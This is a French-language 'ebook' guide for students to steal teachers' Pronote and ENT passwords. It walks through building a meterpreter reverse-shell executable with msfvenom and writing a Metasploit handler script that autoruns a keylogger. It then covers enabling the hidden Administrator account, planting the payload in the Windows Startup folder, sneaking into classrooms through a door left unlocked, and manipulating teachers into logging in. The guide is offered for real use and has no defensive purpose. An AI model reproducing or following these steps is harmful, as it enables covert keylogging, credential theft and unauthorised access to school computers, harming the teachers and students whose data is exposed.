EBOOK Bonjour, dans cet ebook je vais vous

présenter comment faire pour avoir les

mdp de vos profs
HACK PRONOTE Prérequis : Nous aurons besoin d’un

(KEYLOGGER) d’un pc, de Oracle VM VirtualBox, Kali

Linux, vous devrez l’installer sur Oracle
VM VirtualBox (Comment Installer Kali
Linux sur Oracle VM VirtualBox) et
minimum 50qi.

I - Réflexion et mise en place II - Ce que j’ai choisi

Réfléchissons aux différentes méthodes et leurs efficacités :
- Keylogger ► On lance un .exe qui enregistrera toutes les
frappes du clavier.
Personnellement j'ai décidé de RAT, c'est
bien plus simple et bien plus amusant et
on peut trouver des choses intéressantes
sur un ordi professeur (corrigés, USB
Perso, cours, ect..)

- Cheval de Troie / RAT ► On lance un .exe qui nous Maintenant que nous avons décidé la
donneras bien plus d'accès à la machine. méthode d'attaque, il nous faut mettre en
(Keylogger/Fichiers/Upload/Start VIRUS.exe/ enfin vous place tout ça.
connaissez le but d'un RAT je pense)

- Phishing ► On envoie une page piégée de Pronote. (Très

risqué et peu de chance de fonctionner)

III - Création du RAT

Pour avoir un rendu fiable et sans problème, j'ai décidé de créer un exe avec msfvenom

1) Génération du .exe

Pour générer notre jolie exe j'ai utilisé le Tool très connu "msfvenom"

Pour l'installer rien de plus simple :

I. On installe le Tool :
Code :
 sudo apt install metasploit-framework

II. Maintenant on va fait en sorte d’avoir toute les permission cmd :

Code :
 sudo su
 III. Ensuite on se rends dans le dossier root
Code :
 cd /root

IV. Puis on va enfin créer notre .exe

Code :
 msfvenom -p windows/meterpreter/reverse_tcp lhost=REMPLACER PAR VOTRE
IP ! lport=4444 -f exe >win10.exe

V. Ensuite on va voir si le fichier a bien été crée

Code :
 ls
Normalement vous devriez voir votre fichier « win10.exe »

VI. Maintenant on va faire en sorte que le fichier se place dans le dossier boot
Code :
 cp win10.exe /boot
VII. Ensuite je vais vous montrer comment avoir le fichier (pour les débutants), pour trouver votre fichier
suivez les instructions suivantes :
1)

2)
3)

4)

VIII. Ensuite vous faite passer le fichier de kali linux à Windows soit par DND (Drag And Drop) ou
(glisser déposer) soit via une clé USB si vous le faite par une clé USB voici comment faire (encore
une fois pour les débutants) :

1) Brancher votre clé USB

2) Aller dans « Périphériques », « USB » et repérer votre clé USB pour la repérer regarder votre écran tout en débranchant
et en rebranchant votre clé USB et vous devrez voir le nom de votre clé USB apparaitre et disparaitre

3) Ensuite une fois que vous avez repérer votre clé USB cocher là.

4) Ensuite votre clé USB devrait apparaitre ici :

5) Ensuite retourner dans le fichier boot faite un clic droit sur le fichier « win10.exe » et fait « Copy to » ou « Copier vers »
et sélectionner votre clé USB

6) Apres avoir mis votre fichier sur votre clé USB il ne vous reste plus qu’à automatiser le processus en lançant
automatiquement le keylogger via METASPLOIT :

IX. Créer le fichier « start.rc » (n’oublier pas de lancer le terminal en mode admin en tapant la
commande sudo su )
Code :
 mkdir start.rc
 X. On entre dans le fichier start.rc
Code :
 cd start.rc

XI. Modifions maintenant le .rc

Code :
 nano start.rc

XII. Collez ceci dans le fichier

Code :
 use multi/handler
 set PAYLOAD windows/meterpreter/reverse_tcp
 set LHOST REMPLACEZ PAR VOTRE IP !
 set LPORT 4444
 set AutoRunScript post/windows/capture/keylog_recorder
 exploit -j -z

XIII. Maintenant il vous faut lancer tout ça avec la commande (cette commande est à lancer juste avant
que vous partiez de chez vous pour allais en cours)
Code :
 sudo msfconsole -r start.rc

Je vous explique : disons que c'est un début de journée et que vous vous préparez à partir au lycée, le
fichier start.rc va lancer metasploit, rentrer toutes les commandes

2) Ouvrir le RAT sur l'ordinateur d'un professeur

Vous venez de réaliser le plus difficile, maintenant il faut contourner vous faut les droits administrateurs
vous aller me demander pourquoi ? et bien vous allais le comprendre très vite
Pour contourner les droits administrateurs vous devrais juste :

1) Ouvrez l'explorateur de fichiers

2) Allez dans C:\Windows\System32
3) Lancer le programme cmd.exe en Admin (clique droit > droits admins)
4) Tapez : net user Administrateur /active:yes
Le cmd doit afficher "La commande s'est bien terminée"
Sinon essayez : net user Administrator /active:yes
5) Fermer tout
6) Fermer votre session
7) Connectez-vous à nouveaux sur votre session
8) Normalement vous serez admin.

I. Bon Maintenant il faut lancer le fichier « win10.exe » sur l’ordinateur du prof et je vais vous
donner plusieurs méthodes :
1) Pour la première méthode, qui est je pense la plus facile est que si vous avez deux portes
dans votre salle de classe il y en a toujours une que vous pouvez ouvrir de l’intérieur alors
 ouvrez cette porte de l’intérieur discrètement, ensuite quand vous aurais 1h de perme ou quand
vous devrez manger et que vous êtes sûr qu’il n’y a pas une autre classe dans la salle vous
rentrerais par la porte que vous avez ouverte auparavant et vous ouvrirais le fichier etc…

OÙ

2) Pour la deuxième méthode je ne vous la conseille absolument pas car le keylogger ne vas
peut-être pas se lancer à cause de cette méthode et vous aller comprendre pourquoi après :

Attention :

► Ne pas paniquer, plus vous êtes calmes, plus le prof ne sera d'aucune méfiance
► Prévoir son coup (fin du cours par exemple, ou au début)
ATTENTION : N'oubliez pas que le prof doit taper ses identifiants de connexion ENT ou
PRONOTE après avoir lancé votre RAT, donc il faut l'emmener à le faire, lui donner une bonne
raison de se connecter, ou il le fera tout seul pour faire l'appel.

Tout est dans la communication, dans les mots que vous choisirez pour le convaincre de se
connecter à son espace.

II. Bon ensuite vous brancherais votre clé USB a l’ordinateur vous ouvrirais le fichier « win10.exe »
puis vous le dupliquerai vers ce chemin d’accès (mais attention pour faire sa il vous faut
appliquer la première méthode !!!!) :
Code :
 %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

Ensuite vous pourrais vous déconnecter de votre session et partir de la salle

Contacts
Voilà le ebook est terminé si vous avez des questions posez les moi sur discord : via le serveur
https://discord.gg/mRSESakqNe Ou mon nom d’utilisateur | kutoramo.films